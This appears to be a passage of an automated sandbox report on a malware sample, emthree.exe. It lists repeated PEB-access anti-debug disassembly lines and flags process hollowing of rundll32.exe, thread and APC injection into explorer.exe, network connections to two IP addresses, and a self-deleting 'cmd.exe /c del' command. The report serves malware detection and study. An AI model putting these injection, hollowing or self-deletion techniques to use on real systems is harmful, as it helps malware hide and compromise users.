          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FE2D8A mov eax, dword ptr fs:[00000030h]1_2_00FE2D8A
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FE2D8A mov eax, dword ptr fs:[00000030h]1_2_00FE2D8A
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FE2D8A mov eax, dword ptr fs:[00000030h]1_2_00FE2D8A
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FE2D8A mov eax, dword ptr fs:[00000030h]1_2_00FE2D8A
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101AC7B mov eax, dword ptr fs:[00000030h]1_2_0101AC7B
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101AC7B mov eax, dword ptr fs:[00000030h]1_2_0101AC7B
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101AC7B mov eax, dword ptr fs:[00000030h]1_2_0101AC7B
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101AC7B mov eax, dword ptr fs:[00000030h]1_2_0101AC7B
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101AC7B mov eax, dword ptr fs:[00000030h]1_2_0101AC7B
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101AC7B mov eax, dword ptr fs:[00000030h]1_2_0101AC7B
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101AC7B mov eax, dword ptr fs:[00000030h]1_2_0101AC7B
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101AC7B mov eax, dword ptr fs:[00000030h]1_2_0101AC7B
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101AC7B mov eax, dword ptr fs:[00000030h]1_2_0101AC7B
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101AC7B mov eax, dword ptr fs:[00000030h]1_2_0101AC7B
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101AC7B mov eax, dword ptr fs:[00000030h]1_2_0101AC7B
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A4496 mov eax, dword ptr fs:[00000030h]1_2_010A4496
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A4496 mov eax, dword ptr fs:[00000030h]1_2_010A4496
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A4496 mov eax, dword ptr fs:[00000030h]1_2_010A4496
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A4496 mov eax, dword ptr fs:[00000030h]1_2_010A4496
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A4496 mov eax, dword ptr fs:[00000030h]1_2_010A4496
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A4496 mov eax, dword ptr fs:[00000030h]1_2_010A4496
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A4496 mov eax, dword ptr fs:[00000030h]1_2_010A4496
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A4496 mov eax, dword ptr fs:[00000030h]1_2_010A4496
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A4496 mov eax, dword ptr fs:[00000030h]1_2_010A4496
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A4496 mov eax, dword ptr fs:[00000030h]1_2_010A4496
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A4496 mov eax, dword ptr fs:[00000030h]1_2_010A4496
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A4496 mov eax, dword ptr fs:[00000030h]1_2_010A4496
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A4496 mov eax, dword ptr fs:[00000030h]1_2_010A4496
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF3D34 mov eax, dword ptr fs:[00000030h]1_2_00FF3D34
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF3D34 mov eax, dword ptr fs:[00000030h]1_2_00FF3D34
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF3D34 mov eax, dword ptr fs:[00000030h]1_2_00FF3D34
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF3D34 mov eax, dword ptr fs:[00000030h]1_2_00FF3D34
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF3D34 mov eax, dword ptr fs:[00000030h]1_2_00FF3D34
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF3D34 mov eax, dword ptr fs:[00000030h]1_2_00FF3D34
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF3D34 mov eax, dword ptr fs:[00000030h]1_2_00FF3D34
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF3D34 mov eax, dword ptr fs:[00000030h]1_2_00FF3D34
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF3D34 mov eax, dword ptr fs:[00000030h]1_2_00FF3D34
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF3D34 mov eax, dword ptr fs:[00000030h]1_2_00FF3D34
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF3D34 mov eax, dword ptr fs:[00000030h]1_2_00FF3D34
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF3D34 mov eax, dword ptr fs:[00000030h]1_2_00FF3D34
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF3D34 mov eax, dword ptr fs:[00000030h]1_2_00FF3D34
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FEAD30 mov eax, dword ptr fs:[00000030h]1_2_00FEAD30
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010B8CD6 mov eax, dword ptr fs:[00000030h]1_2_010B8CD6
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A14FB mov eax, dword ptr fs:[00000030h]1_2_010A14FB
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01066CF0 mov eax, dword ptr fs:[00000030h]1_2_01066CF0
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01066CF0 mov eax, dword ptr fs:[00000030h]1_2_01066CF0
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01066CF0 mov eax, dword ptr fs:[00000030h]1_2_01066CF0
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010B070D mov eax, dword ptr fs:[00000030h]1_2_010B070D
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010B070D mov eax, dword ptr fs:[00000030h]1_2_010B070D
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101A70E mov eax, dword ptr fs:[00000030h]1_2_0101A70E
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101A70E mov eax, dword ptr fs:[00000030h]1_2_0101A70E
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100F716 mov eax, dword ptr fs:[00000030h]1_2_0100F716
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0107FF10 mov eax, dword ptr fs:[00000030h]1_2_0107FF10
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0107FF10 mov eax, dword ptr fs:[00000030h]1_2_0107FF10
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF76E2 mov eax, dword ptr fs:[00000030h]1_2_00FF76E2
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101E730 mov eax, dword ptr fs:[00000030h]1_2_0101E730
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100B73D mov eax, dword ptr fs:[00000030h]1_2_0100B73D
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100B73D mov eax, dword ptr fs:[00000030h]1_2_0100B73D
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010B8F6A mov eax, dword ptr fs:[00000030h]1_2_010B8F6A
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF766D mov eax, dword ptr fs:[00000030h]1_2_00FF766D
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01067794 mov eax, dword ptr fs:[00000030h]1_2_01067794
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01067794 mov eax, dword ptr fs:[00000030h]1_2_01067794
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01067794 mov eax, dword ptr fs:[00000030h]1_2_01067794
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF7E41 mov eax, dword ptr fs:[00000030h]1_2_00FF7E41
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF7E41 mov eax, dword ptr fs:[00000030h]1_2_00FF7E41
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF7E41 mov eax, dword ptr fs:[00000030h]1_2_00FF7E41
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF7E41 mov eax, dword ptr fs:[00000030h]1_2_00FF7E41
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF7E41 mov eax, dword ptr fs:[00000030h]1_2_00FF7E41
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF7E41 mov eax, dword ptr fs:[00000030h]1_2_00FF7E41
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FEE620 mov eax, dword ptr fs:[00000030h]1_2_00FEE620
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010237F5 mov eax, dword ptr fs:[00000030h]1_2_010237F5
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FEC600 mov eax, dword ptr fs:[00000030h]1_2_00FEC600
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FEC600 mov eax, dword ptr fs:[00000030h]1_2_00FEC600
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FEC600 mov eax, dword ptr fs:[00000030h]1_2_00FEC600
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01018E00 mov eax, dword ptr fs:[00000030h]1_2_01018E00
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A1608 mov eax, dword ptr fs:[00000030h]1_2_010A1608
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101A61C mov eax, dword ptr fs:[00000030h]1_2_0101A61C
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101A61C mov eax, dword ptr fs:[00000030h]1_2_0101A61C
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0109FE3F mov eax, dword ptr fs:[00000030h]1_2_0109FE3F
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010AAE44 mov eax, dword ptr fs:[00000030h]1_2_010AAE44
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010AAE44 mov eax, dword ptr fs:[00000030h]1_2_010AAE44
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF8794 mov eax, dword ptr fs:[00000030h]1_2_00FF8794
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100AE73 mov eax, dword ptr fs:[00000030h]1_2_0100AE73
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100AE73 mov eax, dword ptr fs:[00000030h]1_2_0100AE73
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100AE73 mov eax, dword ptr fs:[00000030h]1_2_0100AE73
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100AE73 mov eax, dword ptr fs:[00000030h]1_2_0100AE73
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100AE73 mov eax, dword ptr fs:[00000030h]1_2_0100AE73
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0107FE87 mov eax, dword ptr fs:[00000030h]1_2_0107FE87
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FFFF60 mov eax, dword ptr fs:[00000030h]1_2_00FFFF60
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010646A7 mov eax, dword ptr fs:[00000030h]1_2_010646A7
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010B0EA5 mov eax, dword ptr fs:[00000030h]1_2_010B0EA5
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010B0EA5 mov eax, dword ptr fs:[00000030h]1_2_010B0EA5
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010B0EA5 mov eax, dword ptr fs:[00000030h]1_2_010B0EA5
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FFEF40 mov eax, dword ptr fs:[00000030h]1_2_00FFEF40
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01028EC7 mov eax, dword ptr fs:[00000030h]1_2_01028EC7
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0109FEC0 mov eax, dword ptr fs:[00000030h]1_2_0109FEC0
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010136CC mov eax, dword ptr fs:[00000030h]1_2_010136CC
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FE4F2E mov eax, dword ptr fs:[00000030h]1_2_00FE4F2E
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FE4F2E mov eax, dword ptr fs:[00000030h]1_2_00FE4F2E
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010B8ED6 mov eax, dword ptr fs:[00000030h]1_2_010B8ED6
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010116E0 mov ecx, dword ptr fs:[00000030h]1_2_010116E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F26CF0 mov eax, dword ptr fs:[00000030h]6_2_04F26CF0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F26CF0 mov eax, dword ptr fs:[00000030h]6_2_04F26CF0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F26CF0 mov eax, dword ptr fs:[00000030h]6_2_04F26CF0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F614FB mov eax, dword ptr fs:[00000030h]6_2_04F614FB
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F78CD6 mov eax, dword ptr fs:[00000030h]6_2_04F78CD6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F64496 mov eax, dword ptr fs:[00000030h]6_2_04F64496
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F64496 mov eax, dword ptr fs:[00000030h]6_2_04F64496
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F64496 mov eax, dword ptr fs:[00000030h]6_2_04F64496
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F64496 mov eax, dword ptr fs:[00000030h]6_2_04F64496
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F64496 mov eax, dword ptr fs:[00000030h]6_2_04F64496
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F64496 mov eax, dword ptr fs:[00000030h]6_2_04F64496
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F64496 mov eax, dword ptr fs:[00000030h]6_2_04F64496
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F64496 mov eax, dword ptr fs:[00000030h]6_2_04F64496
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F64496 mov eax, dword ptr fs:[00000030h]6_2_04F64496
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F64496 mov eax, dword ptr fs:[00000030h]6_2_04F64496
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F64496 mov eax, dword ptr fs:[00000030h]6_2_04F64496
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F64496 mov eax, dword ptr fs:[00000030h]6_2_04F64496
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F64496 mov eax, dword ptr fs:[00000030h]6_2_04F64496
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EB849B mov eax, dword ptr fs:[00000030h]6_2_04EB849B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EC746D mov eax, dword ptr fs:[00000030h]6_2_04EC746D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EDAC7B mov eax, dword ptr fs:[00000030h]6_2_04EDAC7B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EDAC7B mov eax, dword ptr fs:[00000030h]6_2_04EDAC7B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EDAC7B mov eax, dword ptr fs:[00000030h]6_2_04EDAC7B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EDAC7B mov eax, dword ptr fs:[00000030h]6_2_04EDAC7B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EDAC7B mov eax, dword ptr fs:[00000030h]6_2_04EDAC7B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EDAC7B mov eax, dword ptr fs:[00000030h]6_2_04EDAC7B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EDAC7B mov eax, dword ptr fs:[00000030h]6_2_04EDAC7B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EDAC7B mov eax, dword ptr fs:[00000030h]6_2_04EDAC7B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EDAC7B mov eax, dword ptr fs:[00000030h]6_2_04EDAC7B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EDAC7B mov eax, dword ptr fs:[00000030h]6_2_04EDAC7B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EDAC7B mov eax, dword ptr fs:[00000030h]6_2_04EDAC7B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F3C450 mov eax, dword ptr fs:[00000030h]6_2_04F3C450
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F3C450 mov eax, dword ptr fs:[00000030h]6_2_04F3C450
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EDA44B mov eax, dword ptr fs:[00000030h]6_2_04EDA44B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EDBC2C mov eax, dword ptr fs:[00000030h]6_2_04EDBC2C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F61C06 mov eax, dword ptr fs:[00000030h]6_2_04F61C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F61C06 mov eax, dword ptr fs:[00000030h]6_2_04F61C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F61C06 mov eax, dword ptr fs:[00000030h]6_2_04F61C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F61C06 mov eax, dword ptr fs:[00000030h]6_2_04F61C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F61C06 mov eax, dword ptr fs:[00000030h]6_2_04F61C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F61C06 mov eax, dword ptr fs:[00000030h]6_2_04F61C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F61C06 mov eax, dword ptr fs:[00000030h]6_2_04F61C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F61C06 mov eax, dword ptr fs:[00000030h]6_2_04F61C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F61C06 mov eax, dword ptr fs:[00000030h]6_2_04F61C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F61C06 mov eax, dword ptr fs:[00000030h]6_2_04F61C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F61C06 mov eax, dword ptr fs:[00000030h]6_2_04F61C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F61C06 mov eax, dword ptr fs:[00000030h]6_2_04F61C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F61C06 mov eax, dword ptr fs:[00000030h]6_2_04F61C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F61C06 mov eax, dword ptr fs:[00000030h]6_2_04F61C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F26C0A mov eax, dword ptr fs:[00000030h]6_2_04F26C0A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F26C0A mov eax, dword ptr fs:[00000030h]6_2_04F26C0A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F26C0A mov eax, dword ptr fs:[00000030h]6_2_04F26C0A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F26C0A mov eax, dword ptr fs:[00000030h]6_2_04F26C0A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F7740D mov eax, dword ptr fs:[00000030h]6_2_04F7740D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F7740D mov eax, dword ptr fs:[00000030h]6_2_04F7740D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F7740D mov eax, dword ptr fs:[00000030h]6_2_04F7740D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F58DF1 mov eax, dword ptr fs:[00000030h]6_2_04F58DF1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EBD5E0 mov eax, dword ptr fs:[00000030h]6_2_04EBD5E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EBD5E0 mov eax, dword ptr fs:[00000030h]6_2_04EBD5E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F6FDE2 mov eax, dword ptr fs:[00000030h]6_2_04F6FDE2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F6FDE2 mov eax, dword ptr fs:[00000030h]6_2_04F6FDE2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F6FDE2 mov eax, dword ptr fs:[00000030h]6_2_04F6FDE2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F6FDE2 mov eax, dword ptr fs:[00000030h]6_2_04F6FDE2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F26DC9 mov eax, dword ptr fs:[00000030h]6_2_04F26DC9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F26DC9 mov eax, dword ptr fs:[00000030h]6_2_04F26DC9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F26DC9 mov eax, dword ptr fs:[00000030h]6_2_04F26DC9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F26DC9 mov ecx, dword ptr fs:[00000030h]6_2_04F26DC9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F26DC9 mov eax, dword ptr fs:[00000030h]6_2_04F26DC9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F26DC9 mov eax, dword ptr fs:[00000030h]6_2_04F26DC9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04ED35A1 mov eax, dword ptr fs:[00000030h]6_2_04ED35A1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04ED1DB5 mov eax, dword ptr fs:[00000030h]6_2_04ED1DB5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04ED1DB5 mov eax, dword ptr fs:[00000030h]6_2_04ED1DB5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04ED1DB5 mov eax, dword ptr fs:[00000030h]6_2_04ED1DB5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F705AC mov eax, dword ptr fs:[00000030h]6_2_04F705AC
          Source: C:\Users\user\Desktop\emthree.exe, Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\rundll32.exe, Process token adjusted: Debug
          Source: C:\Users\user\Desktop\emthree.exe, Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe, Network Connect: 23.27.109.19 80
          Source: C:\Windows\explorer.exe, Network Connect: 184.154.50.243 80
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\emthree.exe, Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\emthree.exe, Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\emthree.exe, Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\rundll32.exe, Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\rundll32.exe, Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\emthree.exe, Thread register set: target process: 3472
          Source: C:\Windows\SysWOW64\rundll32.exe, Thread register set: target process: 3472
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\emthree.exe, Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\emthree.exe, Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: AC0000
          Source: C:\Users\user\Desktop\emthree.exe, Process created: C:\Users\user\Desktop\emthree.exe {path}
          Source: C:\Windows\SysWOW64\rundll32.exe, Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\emthree.exe'
          Source: explorer.exe, 00000002.00000002.503348798.0000000005EA0000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000002.490167747.0000000003730000.00000002.00000001.sdmp, Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000002.00000000.242251394.0000000001640000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.490167747.0000000003730000.00000002.00000001.sdmp, Binary or memory string: Progman
          Source: explorer.exe, 00000002.00000000.242251394.0000000001640000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.490167747.0000000003730000.00000002.00000001.sdmp, Binary or memory string: SProgram Managerl
          Source: explorer.exe, 00000002.00000002.488072734.0000000001128000.00000004.00000020.sdmp, Binary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000002.00000000.242251394.0000000001640000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.490167747.0000000003730000.00000002.00000001.sdmp, Binary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000002.00000000.242251394.0000000001640000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.490167747.0000000003730000.00000002.00000001.sdmp, Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\emthree.exe, Queries volume information: C:\Users\user\Desktop\emthree.exe VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
